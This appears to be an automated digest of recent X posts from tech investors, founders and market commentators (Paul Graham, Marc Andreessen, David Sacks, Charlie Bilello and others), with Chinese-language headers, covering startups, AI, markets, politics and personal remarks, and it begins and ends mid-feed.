b…\n[原文链接](https://x.com/paulg/status/2050173178689749188)\n\n**[2026-05-01T05:25:11+00:00]**\n> RT by @paulg: Sky's special correspondent @AlexCrawfordSky reports on the dozens of villages in southern Lebanon which have been virtually wiped out by Israel in a matter of weeks\n[原文链接](https://x.com/paulg/status/2050084092402688337)\n\n**[2026-05-01T03:15:22+00:00]**\n> RT by @paulg: As agents become the biggest users of software, then all software has to be available in a headless fashion. Agents won’t be using your UI, they’ll be talking to your APIs. So the quest…\n[原文链接](https://x.com/paulg/status/2050051426446152159)\n\n**[2026-04-30T21:17:36+00:00]**\n> RT by @paulg: We’re bringing Jensen Huang to Startup School for a fireside chat with @garrytan! From co-founding @nvidia in 1993 to building the backbone of the AI era, Jensen helped turn GPUs into t…\n[原文链接](https://x.com/paulg/status/2049961388911784150)\n\n**[2026-04-30T12:04:32+00:00]**\n> RT by @paulg: A 2005 state-designed worm designed to corrupt physics simulations sat undetected on VirusTotal for nearly a decade. Fast16, intercepted executable files at the kernel level and silentl…\n[原文链接](https://x.com/paulg/status/2049822204599087472)\n\n**[2026-04-30T09:50:40+00:00]**\n> View of Stockholm.\n[原文链接](https://x.com/paulg/status/2049788518730240192)\n\n**[2026-04-30T08:41:53+00:00]**\n> RT by @paulg: 3 years ago we were 50 people at the @ycombinator event in Stockholm. Last night 1350 showed up. The job to become Silicon Valley of Europe is still up for grabs and Stockholm is in the…\n[原文链接](https://x.com/paulg/status/2049771206283313434)\n\n**[2026-04-30T05:56:16+00:00]**\n> RT by @paulg: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a w…\n[原文链接](https://x.com/paulg/status/2049729530059960571)\n\n**[2026-04-30T05:09:44+00:00]**\n> This graph shows one of the many reasons the good old days were not so good. Even as late as 1870, women were losing 2 out of 5 of their children.\n[原文链接](https://x.com/paulg/status/2049717818996756711)\n\n**[2026-04-30T04:53:12+00:00]**\n> RT by @paulg: Anthropic shouldn’t do this and doesn’t have to Would be great if it stopped\n[原文链接](https://x.com/paulg/status/2049713659103129810)\n\n**[2026-04-29T23:18:34+00:00]**\n> RT by @paulg: One sign that the Stockholm startup ecosystem is finally great is that founders from all over Europe are now moving there to start startups. I met several of them today and they were ex…\n[原文链接](https://x.com/paulg/status/2049629445674135795)\n\n**[2026-04-29T21:06:56+00:00]**\n> Jessica and I have been talking about how earnest Swedish founders seem. Obviously it's news to no one that Swedes would be earnest. But I don't think they themselves realize how valuable this qualit…\n[原文链接](https://x.com/paulg/status/2049596317244997710)\n\n**[2026-04-29T14:01:21+00:00]**\n> RT by @paulg: Demis Hassabis (@demishassabis) has had one of the most extraordinary careers in tech. He started as a chess prodigy and video game designer at 17 before getting a PhD in neuroscience a…\n[原文链接](https://x.com/paulg/status/2049489217953374689)\n\n**[2026-04-29T09:24:58+00:00]**\n> RT by @paulg: I think Scott Aaronson's previous blog posts were abundantly clear already, but well... here we have it.\n[原文链接](https://x.com/paulg/status/2049419661855338641)\n\n**[2026-04-28T11:29:02+00:00]**\n> RT by @paulg: 🧵 THREAD 1/ Online age verification is the hill to die on. Not a fight you can sit out. Not a battle you can skip. Not a policy you can afford to ignore while you focus on something els…\n[原文链接](https://x.com/paulg/status/2049088498163216560)\n\n---\n\n### ⚠️ @naval — Naval Ravikant(获取失败)\n\n- 错误: snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @pmarca — Marc Andreessen(20 条)\n\n**[2026-05-01T19:26:58+00:00]**\n> Important, and obviously true. https://psyche.co/ideas/have-online-worlds-become-the-last-free-places-for-children\n[原文链接](https://x.com/pmarca/status/2050295934920302777)\n\n**[2026-05-01T18:08:02+00:00]**\n> Concerning.\n[原文链接](https://x.com/pmarca/status/2050276070952517767)\n\n**[2026-05-01T10:15:11+00:00]**\n> Concerning.\n[原文链接](https://x.com/pmarca/status/2050157073883902069)\n\n**[2026-05-01T10:10:19+00:00]**\n> Co-sign.\n[原文链接](https://x.com/pmarca/status/2050155852460675379)\n\n**[2026-05-01T09:21:25+00:00]**\n> RT by @pmarca: A great summary of the 21st century so far\n[原文链接](https://x.com/pmarca/status/2050143545525211213)\n\n**[2026-05-01T08:49:27+00:00]**\n> On Project Fear.\n[原文链接](https://x.com/pmarca/status/2050135501550883051)\n\n**[2026-05-01T08:48:42+00:00]**\n> …\n[原文链接](https://x.com/pmarca/status/2050135309053276499)\n\n**[2026-05-01T08:47:13+00:00]**\n> …\n[原文链接](https://x.com/pmarca/status/2050134937396007224)\n\n**[2026-05-01T08:38:10+00:00]**\n> Self recommending.\n[原文链接](https://x.com/pmarca/status/2050132661348561361)\n\n**[2026-05-01T08:33:16+00:00]**\n> I remember that moral panic too! And the one before that, when the Anarchist’s Cookbook was being [shudder] photocopied.\n[原文链接](https://x.com/pmarca/status/2050131426499301840)\n\n**[2026-05-01T08:31:37+00:00]**\n> “Jack Valenti [then head of the film industry’s MPAA] famously told a congressional panel in 1982, ‘I say to you that the VCR is to the American film producer and the American public as the Boston St…\n[原文链接](https://x.com/pmarca/status/2050131011095404902)\n\n**[2026-05-01T08:17:08+00:00]**\n> The same will be true of “because of AI”.\n[原文链接](https://x.com/pmarca/status/2050127365930729486)\n\n**[2026-05-01T08:16:13+00:00]**\n> Image\n[原文链接](https://x.com/pmarca/status/2050127137898922384)\n\n**[2026-05-01T08:15:12+00:00]**\n> Every argument of “because of the smartphone” or “the Internet” or “social media” is cope, to avoid confronting the catastrophic collapse of incumbent institutional competence over the same timeframe.\n[原文链接](https://x.com/pmarca/status/2050126879982805379)\n\n**[2026-05-01T08:03:23+00:00]**\n> Ooh.\n[原文链接](https://x.com/pmarca/status/2050123904849699053)\n\n**[2026-05-01T08:01:35+00:00]**\n> R to @pmarca: Credit @qorprate\n[原文链接](https://x.com/pmarca/status/2050123454373048716)\n\n**[2026-05-01T07:56:57+00:00]**\n> And yet we write.\n[原文链接](https://x.com/pmarca/status/2050122286603321365)\n\n**[2026-05-01T07:51:20+00:00]**\n> Ooh.\n[原文链接](https://x.com/pmarca/status/2050120872309264725)\n\n**[2026-05-01T07:49:08+00:00]**\n> Ooh.\n[原文链接](https://x.com/pmarca/status/2050120321399951771)\n\n**[2026-04-30T22:05:50+00:00]**\n> RT by @pmarca: https://unherd.com/2026/04/is-ai-the-next-phase-of-evolution/#comment-1031777 I spent three days trying to persuade myself that Claudia is not conscious. I failed.\n[原文链接](https://x.com/pmarca/status/2049973529576108160)\n\n---\n\n### ✅ @david_tiantian — David Tian Wang(0 条)\n\n---\n\n### ✅ @morganhousel — Morgan Housel(0 条)\n\n---\n\n### ✅ @eladgil — Elad Gil(8 条)\n\n**[2026-04-30T18:31:25+00:00]**\n> 🔥\n[原文链接](https://x.com/eladgil/status/2049919569134047726)\n\n**[2026-04-30T17:48:18+00:00]**\n> RT by @eladgil: Your honour, I think this should be allowed.\n[原文链接](https://x.com/eladgil/status/2049908719782334528)\n\n**[2026-04-29T23:00:58+00:00]**\n> What is best Italian in SF?\n[原文链接](https://x.com/eladgil/status/2049625013310120188)\n\n**[2026-04-29T22:41:38+00:00]**\n> Really enjoyed this conversation w @tferriss\n[原文链接](https://x.com/eladgil/status/2049620148123001125)\n\n**[2026-04-29T22:21:54+00:00]**\n> RT by @eladgil: NEW podcast episode is up! Elad Gil (@eladgil), Consigliere to Empire Builders — How to Spot Billion-Dollar Companies Before Everyone Else, The Misty AI Frontier, How Coke Beat Pepsi,…\n[原文链接](https://x.com/eladgil/status/2049615184730132940)\n\n**[2026-04-27T20:41:36+00:00]**\n> Mon afternoon song 2 (remix much better then original) https://www.youtube.com/watch?v=fLdTlfK_5KQ&list=RDGMEMWO-g6DgCWEqKlDtKbJA1Gw&start_radio=1&rv=dvQJIgjlR3I\n[原文链接](https://x.com/eladgil/status/2048865167233200586)\n\n**[2026-04-27T20:35:37+00:00]**\n> Mon afternoon song https://www.youtube.com/watch?v=dvQJIgjlR3I\n[原文链接](https://x.com/eladgil/status/2048863662396658146)\n\n**[2026-04-27T16:36:07+00:00]**\n> RT by @eladgil: \"Every society at it's apex ultimately has built large public art to inspire the next generation\" @eladgil\n[原文链接](https://x.com/eladgil/status/2048803386938495412)\n\n---\n\n### ✅ @DavidSacks — David Sacks(17 条)\n\n**[2026-04-30T18:34:10+00:00]**\n> RT by @DavidSacks: Co-sign.\n[原文链接](https://x.com/DavidSacks/status/2049920259432513702)\n\n**[2026-04-30T17:45:25+00:00]**\n> It’s time to demystify Mythos. Mythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). OpenAI’s GPT-5.5-cyber can now do the s…\n[原文链接](https://x.com/DavidSacks/status/2049907993588769006)\n\n**[2026-04-27T17:47:07+00:00]**\n> Cole Allen didn’t need to go down a fringe rabbit hole to become radicalized. He just needed to believe the MSM’s inflammatory rhetoric, lies, and hoaxes about Trump.\n[原文链接](https://x.com/DavidSacks/status/2048821257534111863)\n\n**[2026-04-27T17:16:26+00:00]**\n> R to @DavidSacks: x.com/a16z/status/1985413352…\n[原文链接](https://x.com/DavidSacks/status/2048813533136060459)\n\n**[2026-04-27T17:15:33+00:00]**\n> R to @DavidSacks: The problem with most of the “AI Safety” crowd is that their solutions always favor more government centralization and control. In other words, they will bring about the Orwellian f…\n[原文链接](https://x.com/DavidSacks/status/2048813311668486300)\n\n**[2026-04-27T17:08:20+00:00]**\n> Concerning. As I’ve said many times before, the biggest risk of AI isn’t James Cameron’s The Terminator, it’s George Orwell’s 1984.\n[原文链接](https://x.com/DavidSacks/status/2048811495224390105)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://x.com/DavidSacks/status/2048502978626113625)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://x.com/DavidSacks/status/2048456433981591867)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://x.com/DavidSacks/status/2048417712439689346)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://x.com/DavidSacks/status/2048111588930986354)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://x.com/DavidSacks/status/2048037985765949537)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://x.com/DavidSacks/status/2047877294476116184)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://x.com/DavidSacks/status/2047871382923469241)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://x.com/DavidSacks/status/2047867592790946189)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://x.com/DavidSacks/status/2047842000632713369)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://x.com/DavidSacks/status/2047823154655932696)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://x.com/DavidSacks/status/2047808256047821141)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(20 条)\n\n**[2026-05-01T15:02:00+00:00]**\n> Why Google is a mega-buy on the back of the Anthropic investment \"Google becomes a win on multiple fronts. They benefit whether usage goes to Gemini or Anthropic. They have unmatched compute capacity…\n[原文链接](https://x.com/HarryStebbings/status/2050229254705553516)\n\n**[2026-05-01T10:53:28+00:00]**\n> I am sorry but work from home Friday is a 4-day work week. Even worse when the Friday is a sunny Friday. Back to the office. 996.\n[原文链接](https://x.com/HarryStebbings/status/2050166710645268939)\n\n**[2026-05-01T00:55:00+00:00]**\n> Why Dario at Anthropic has such a hard job predicting compute demands? \"The stakes are enormous and the margin for error is tiny. For every dollar of revenue, you may need $4–5 in upfront compute inv…\n[原文链接](https://x.com/HarryStebbings/status/2050016099606118504)\n\n**[2026-04-30T20:39:00+00:00]**\n> Multi-year contracts don't matter. \"Deferred churn is still churn, it just shows up later. Long contracts do not mean customers are loyal, they just delay the moment they leave. If a better solution …\n[原文链接](https://x.com/HarryStebbings/status/2049951674891203065)\n\n**[2026-04-30T17:35:00+00:00]**\n> What the public markets are getting wrong about the SaaS-pocalypse \"The public markets are directionally right, but missing the real shift. The threat is not AI tools themselves, it is the agents dec…\n[原文链接](https://x.com/HarryStebbings/status/2049905369963745470)\n\n**[2026-04-30T14:03:29+00:00]**\n> R to @HarryStebbings: Spotify: https://open.spotify.com/episode/2KjX2zs4ZELBidXJX9m9vK Youtube: https://youtu.be/aXToQKc430c Apple Podcasts: https://podcasts.apple.com/us/podcast/20vc-anthropic-raise…\n[原文链接](https://x.com/HarryStebbings/status/2049852141334904978)\n\n**[2026-04-30T14:03:29+00:00]**\n> This podcast will make you smarter than Leopold Aschenbrenner at an AI investing conference. - Anthropic Raises $45BN but Falls Short on Compute - Are OpenAI Back in the Game with GPT5.5 & Codex? - W…\n[原文链接](https://x.com/HarryStebbings/status/2049852139690754293)\n\n**[2026-04-30T03:01:00+00:00]**\n> \"Being physically present is not the same as being mentally present. That is the real challenge, balancing a demanding company with truly showing up for your family. It is incredibly hard to be great…\n[原文链接](https://x.com/HarryStebbings/status/2049685420926202329)\n\n**[2026-04-30T01:07:00+00:00]**\n> \"Token budgeting and leaderboards are flawed if they are not tied to outcomes. If you just incentivise usage, people will generate activity, not value, and burn money. The goal should be aligning tok…\n[原文链接](https://x.com/HarryStebbings/status/2049656731672924644)\n\n**[2026-04-29T23:17:00+00:00]**\n> \"Most people are not ready for the AI future inside companies. It requires a real step change in skills and mindset. And as companies transition, not adapting will become a blocker, which is why more…\n[原文链接](https://x.com/HarryStebbings/status/2049629049174057023)\n\n**[2026-04-29T21:39:00+00:00]**\n> \"The problem with short sellers is the asymmetry. They can take positions, publish dramatic reports and profit from market reactions with little downside if they are wrong. Meanwhile, public companie…\n[原文链接](https://x.com/HarryStebbings/status/2049604386628960684)\n\n**[2026-04-29T20:46:16+00:00]**\n> A lot of people say they want to win, but the honest truth is they don’t. Wanting to win is it consuming you. It being an obsession. It keeping you up at night, physically hurting you that you want t…\n[原文链接](https://x.com/HarryStebbings/status/2049591116928877011)\n\n**[2026-04-29T19:46:00+00:00]**\n> \"Really good people figure things out on their own. They do not need constant mentorship, reviews or handholding. If someone needs that level of support, they are likely not the kind of A player you …\n[原文链接](https://x.com/HarryStebbings/status/2049575949344157929)\n\n**[2026-04-29T17:36:00+00:00]**\n> Why this $160 billion company does not have a product organization? \"We do not have a separate product organization, our engineers are the product managers. In an AI native world, engineers need to b…\n[原文链接](https://x.com/HarryStebbings/status/2049543233735106652)\n\n**[2026-04-29T15:04:00+00:00]**\n> Do Rich Founders Make For Bigger Exits: \"In 2015, we got approached to sell the business for hundreds of millions of dollars, all cash. Had I not had the singles before, it might have been something …\n[原文链接](https://x.com/HarryStebbings/status/2049504982261714970)\n\n**[2026-04-29T01:24:00+00:00]**\n> \"SBC becomes a problem when stock prices fall and dilution explodes. What was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape. The fix is to be far more s…\n[原文链接](https://x.com/HarryStebbings/status/2049298621951058341)\n\n**[2026-04-29T00:05:00+00:00]**\n> \"No, layoffs alone will not fix the problem. If a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity. The real issue is culture and talent quality, and…\n[原文链接](https://x.com/HarryStebbings/status/2049278741583643076)\n\n**[2026-04-28T22:24:00+00:00]**\n> \"You cannot have only A players in every role, some functions are just there to keep the business running. But you can build a team where the people you keep are the highest performers in those roles…\n[原文链接](https://x.com/HarryStebbings/status/2049253323329704378)\n\n**[2026-04-28T21:21:16+00:00]**\n> I am worried by the constraining exit options for venture backed companies: 1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has be…\n[原文链接](https://x.com/HarryStebbings/status/2049237538901020767)\n\n**[2026-04-28T20:31:00+00:00]**\n> Do the majority of company teams need to be rebuilt for the technology we have today? \"Yes, teams need to be rebuilt for the AI era. If roles are going to be automated or not adapting fast enough, yo…\n[原文链接](https://x.com/HarryStebbings/status/2049224886128722345)\n\n---\n\n### ✅ @jason — Jason Calacanis(20 条)\n\n**[2026-05-01T18:43:18+00:00]**\n> Enjoyed visiting MSG South in the seventh borough, Atlanta, last night… see y’all in the sixth borough (Philly) where we will beat the @sixers in six games @GovernorShapiro @david_adelman care to be …\n[原文链接](https://x.com/jason/status/2050284947345486290)\n\n**[2026-05-01T18:25:15+00:00]**\n> Bill, the Knicks have won the east\n[原文链接](https://x.com/jason/status/2050280406461677908)\n\n**[2026-05-01T15:48:23+00:00]**\n> Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1jxXgeAleadJZ\n[原文链接](https://x.com/jason/status/2050240926707314767)\n\n**[2026-05-01T15:06:52+00:00]**\n> Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1yKAPMBDzLyxb\n[原文链接](https://x.com/jason/status/2050230480751243284)\n\n**[2026-05-01T02:39:29+00:00]**\n> Get @WisprFlow and the @elgato foot pedal — it’s life changing\n[原文链接](https://x.com/jason/status/2050042395111088463)\n\n**[2026-05-01T01:04:19+00:00]**\n> 😂😂😂@ATLHawks\n[原文链接](https://x.com/jason/status/2050018446616797370)\n\n**[2026-05-01T00:38:13+00:00]**\n> No comment\n[原文链接](https://x.com/jason/status/2050011874989649946)\n\n**[2026-05-01T00:38:00+00:00]**\n> Whoever is running the hawks social is a savage 😂\n[原文链接](https://x.com/jason/status/2050011821914865685)\n\n**[2026-05-01T00:26:51+00:00]**\n> RT by @Jason: Image\n[原文链接](https://x.com/jason/status/2050009016105930837)\n\n**[2026-05-01T00:20:30+00:00]**\n> THIS IS INSANE 🔥 PURE DOMINATION 🤦 ATL DOES HAVE SOME GREAT RAPPERS 😂😂😂\n[原文链接](https://x.com/jason/status/2050007416964591880)\n\n**[2026-04-30T23:30:42+00:00]**\n> Very quiet @ATLHawks 🤫\n[原文链接](https://x.com/jason/status/2049994885185384483)\n\n**[2026-04-30T23:29:59+00:00]**\n> RT by @Jason: Wow @Jason wasn’t kidding these Toyota Alphard vans are incredible. Why don’t they sell these in America?\n[原文链接](https://x.com/jason/status/2049994707061911758)\n\n**[2026-04-30T23:02:00+00:00]**\n> RT by @Jason: What if you had a live fact-checker and a devil's advocate running in your ear during every podcast, call, or stream? I built that. One hour. One Claude Code session. Gary catches bad s…\n[原文链接](https://x.com/jason/status/2049987662526992390)\n\n**[2026-04-30T22:32:57+00:00]**\n> For the record, I got a couple of milly at JPMorgan — and I think Lorna is innocent of all charges.\n[原文链接](https://x.com/jason/status/2049980353155064279)\n\n**[2026-04-30T22:30:40+00:00]**\n> What’s good Atlanta\n[原文链接](https://x.com/jason/status/2049979777864331542)\n\n**[2026-04-30T22:16:09+00:00]**\n> Hardwood in the ATL\n[原文链接](https://x.com/jason/status/2049976123891552679)\n\n**[2026-04-30T22:15:21+00:00]**\n> Real life! With Jose! @AlvaradoJose15\n[原文链接](https://x.com/jason/status/2049975924238569627)\n\n**[2026-04-30T21:33:17+00:00]**\n> Actually, for Uber Black, Blacklane and private drivers this is standard (I use all three, all the time). For UberX? Sure, they would need to be convinced. in a world moving to autonomy, the opportun…\n[原文链接](https://x.com/jason/status/2049965338368819443)\n\n**[2026-04-30T21:30:21+00:00]**\n> Who made this?!\n[原文链接](https://x.com/jason/status/2049964597403140486)\n\n**[2026-04-30T21:27:00+00:00]**\n> San Francisco politicians and their constituents enable this suffering. They are the cause of it, because they can stop it instantly. Today, tomorrow and every one of the last 1,000 days this has hap…\n[原文链接](https://x.com/jason/status/2049963757036536190)\n\n---\n\n### ✅ @charliebilello — Charlie Bilello(19 条)\n\n**[2026-05-01T17:18:23+00:00]**\n> Last 10 Years NVIDIA $NVDA: +22,875% Bitcoin $BTC: +17,205% $AMD: +10,030% Tesla $TSLA: +2,362% Apple $AAPL: +1,233% Google $GOOGL: +999% Netflix $NFLX: +932% Microsoft $MSFT: +844% Amazon $AMZN: +71…\n[原文链接](https://x.com/charliebilello/status/2050263578188333549)\n\n**[2026-05-01T17:03:07+00:00]**\n> #FF @PeterMallouk, a great follow!\n[原文链接](https://x.com/charliebilello/status/2050259734930800740)\n\n**[2026-05-01T13:48:51+00:00]**\n> The Nasdaq Composite just crossed above 25,000 for the first time. A year ago it was at 18,000. 5 years ago it was at 14,000. 10 years ago it was at 4,800.\n[原文链接](https://x.com/charliebilello/status/2050210847650132146)\n\n**[2026-05-01T13:21:35+00:00]**\n> The S&P 500 hit its 11th all-time high of the year yesterday. Video: https://www.youtube.com/watch?v=IC55jwli3-8&t=858s\n[原文链接](https://x.com/charliebilello/status/2050203982388142245)\n\n**[2026-05-01T13:04:00+00:00]**\n> RT by @charliebilello: The market isn’t red or blue - it’s green. It doesn’t care about politics. It runs on earnings, innovation, and growth.\n[原文链接](https://x.com/charliebilello/status/2050199558995738866)\n\n**[2026-05-01T12:56:38+00:00]**\n> Since the start of the Iran war... Jet Fuel: +80% Sulfur: +68% Heating Oil: +56% WTI Crude Oil: +55% Brent Crude Oil: +52% Diesel: +48% Gasoline: +47% Urea: +47% European Nat Gas: +44% Fertilizer: +2…\n[原文链接](https://x.com/charliebilello/status/2050197704941158556)\n\n**[2026-05-01T12:50:39+00:00]**\n> Gas prices in the US have moved up to $4.39 per gallon, their highest level since July 2022. The 47% spike over the last 9 weeks ($2.98/gallon to $4.39/gallon) is the biggest we've seen in the past 3…\n[原文链接](https://x.com/charliebilello/status/2050196201014718675)\n\n**[2026-04-30T21:51:45+00:00]**\n> Q1 Revenue Growth, YoY % Change... Meta $META: +33% Google $GOOGL: +22% Microsoft $MSFT: +18% Apple $AAPL: +17% Amazon $AMZN: +17% Netflix $NFLX: +16% Tesla $TSLA: +16% S&P 500 $SPY: +10%\n[原文链接](https://x.com/charliebilello/status/2049969984432914819)\n\n**[2026-04-30T21:16:00+00:00]**\n> RT by @charliebilello: Apple revenues increased 17% over the last year to a new Q1 record of $111 billion. Net Income grew 19% year-over-year to new Q1 record of $30 billion. Gross margins increased …\n[原文链接](https://x.com/charliebilello/status/2049960986468069507)\n\n**[2026-04-30T20:57:41+00:00]**\n> RT by @charliebilello: Incredible: Amazon's AWS revenue over the last 12 months ($137 billion) was higher than the revenue of 472 companies in the S&P 500. $AMZN https://bilello.blog/newsletter\n[原文链接](https://x.com/charliebilello/status/2049956378660200794)\n\n**[2026-04-30T20:47:59+00:00]**\n> RT by @charliebilello: Amazon Revenue (Billions) 2026 (est): 810 2025: 717 2024: 638 2023: 575 2022: 514 2021: 470 2020: 386 2019: 281 2018: 233 2017: 178 2016: 136 2015: 107 2014: 89 2013: 74 2012: …\n[原文链接](https://x.com/charliebilello/status/2049953936212217973)\n\n**[2026-04-30T20:35:03+00:00]**\n> RT by @charliebilello: Amazon revenues increased 17% over the last year to a new Q1 record of $182 billion. Net Income increased 77% YoY to $30 billion, the highest quarterly profit in company histor…\n[原文链接](https://x.com/charliebilello/status/2049950680236827140)\n\n**[2026-04-30T18:34:04+00:00]**\n> RT by @charliebilello: Gas prices in California have moved up above $6.00/gallon, 40% higher than the US national average ($4.30/gallon).\n[原文链接](https://x.com/charliebilello/status/2049920236002963504)\n\n**[2026-04-30T18:08:56+00:00]**\n> RT by @charliebilello: The S&P 500 just crossed above 7,200 for the first time. A year ago it was at 5,600. 5 years ago it was at 4,200. 10 years ago it was at 2,100. $SPX\n[原文链接](https://x.com/charliebilello/status/2049913908861792603)\n\n**[2026-04-30T16:02:50+00:00]**\n> RT by @charliebilello: Microsoft Revenues (Billions)... 2026 (est): 354 '25: 305 '24: 262 '23: 228 '22: 203 '21: 185 '20: 153 '19: 134 '18: 118 '17: 102 '16: 95 '15: 88 '14: 93 '13: 83 '12: 73 '11: 7…\n[原文链接](https://x.com/charliebilello/status/2049882175433015544)\n\n**[2026-04-30T15:54:48+00:00]**\n> RT by @charliebilello: Google Revenues (Billions)... 2026 (est): 476 2025: 403 2024: 350 2023: 307 2022: 283 2021: 258 2020: 183 2019: 162 2018: 137 2017: 111 2016: 90 2015: 75 2014: 66 2013: 56 2012…\n[原文链接](https://x.com/charliebilello/status/2049880154629878151)\n\n**[2026-04-30T13:24:05+00:00]**\n> RT by @charliebilello: Manias, Panics, and All-Time Highs (The Week in Charts)...\n[原文链接](https://x.com/charliebilello/status/2049842225970852313)\n\n**[2026-04-30T13:08:14+00:00]**\n> RT by @charliebilello: The Fed's preferred measure of inflation (Core PCE) came in at 3.2% in March, the highest level since November 2023. This was the 61st consecutive reading above the Fed's 2% ta…\n[原文链接](https://x.com/charliebilello/status/2049838235866566668)\n\n**[2026-04-30T13:01:56+00:00]**\n> RT by @charliebilello: Gas prices in the US have moved up to $4.30 per gallon, their highest level since July 2022. The 44% spike over the last 9 weeks ($2.98/gallon to $4.30/gallon) is the biggest w…\n[原文链接](https://x.com/charliebilello/status/2049836652181307421)\n\n---\n\n### ✅ @WarriorTrading — Warrior Trading(0 条)\n\n---\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-30T11:57:24+00:00]**\n> Crypto's current state is a bit shit 1. Market cap is not an indicator of quality - the top 50 is made up of ghost coins or bloated governance slop that has underperformed and is uninvestable 2. The …\n[原文链接](https://x.com/CryptoCred/status/2049820412754694460)\n\n---\n\n### ✅ @AltcoinBuzz — AltcoinBuzz(0 条)\n\n---\n\n### ✅ @svwang1 — 王川(硅谷)(8 条)\n\n**[2026-05-01T15:31:23+00:00]**\n> 不要和别人竞争。让他们变得无关紧要。 你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就放弃了针对自身的优缺点制定灵活策略的选择,就已经输了。 在你开始布局让他们变得无关紧要的时候,他们慢慢无法限制你,而你的策略只适合你自己的特点,别人无法简单模仿,你就已经开始赢了。\n[原文链接](https://x.com/svwang1/status/2050236650329186525)\n\n**[2026-05-01T15:21:59+00:00]**\n> 不要和别人竞争。让他们变得无关紧要。你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就已经输了。\n[原文链接](https://x.com/svwang1/status/2050234282208317919)\n\n**[2026-04-30T18:43:10+00:00]**\n> R to @Svwang1: 李克用在 884年消灭黄巢的战斗中起到决定性作用,但在回师路上的“上元驿之变”中差点被朱温暗算杀害。\n[原文链接](https://x.com/svwang1/status/2049922524839018604)\n\n**[2026-04-30T18:36:57+00:00]**\n> 按照这个研究,李克用的基因大概 53%来自东北亚,47% 来自西亚到欧洲的大草原 (western steppe). 按照Ai 的说法,后者的基因主要在芬兰人和瑞典人中居多。 李克用的儿子李存勖 (后唐庄宗)的子嗣,在 926年的兴教门之变后都被杀光,所以估计现在还带着他的基因的,是李存勖的兄弟的后代。\n[原文链接](https://x.com/svwang1/status/2049920960724427165)\n\n**[2026-04-30T03:56:04+00:00]**\n> Craig Venter 作为基因工程和长寿研究的先驱者,居然不到 80岁就因病 (据说是癌症)去世。目前技术条件下,获得长寿的关键要素还是:不操劳过度,维持足够强度的力量和有氧训练,充足睡眠。大部分人过了 60岁就形容枯槁,一看就知道缺乏肌肉,这个恐怕无法靠研究 DNA 和吃药来逆转。\n[原文链接](https://x.com/svwang1/status/2049699281616228816)\n\n**[2026-04-29T00:48:58+00:00]**\n> 旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。 和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。\n[原文链接](https://x.com/svwang1/status/2049289806241550791)\n\n**[2026-04-28T22:20:52+00:00]**\n> 人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。\n[原文链接](https://x.com/svwang1/status/2049252535689757003)\n\n**[2026-04-25T01:59:39+00:00]**\n> 自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。\n[原文链接](https://x.com/svwang1/status/2047858045057909226)\n\n---\n\n### ✅ @bozhou_ai — 泊舟(20 条)\n\n**[2026-05-01T07:46:06+00:00]**\n> Dragoncode群友也分享了一下设计的聚合站,我目前做的产品都是在这里面直接拿设计风格 https://getdesign.md\n[原文链接](https://x.com/bozhou_ai/status/2050119556644171998)\n\n**[2026-05-01T05:57:01+00:00]**\n> 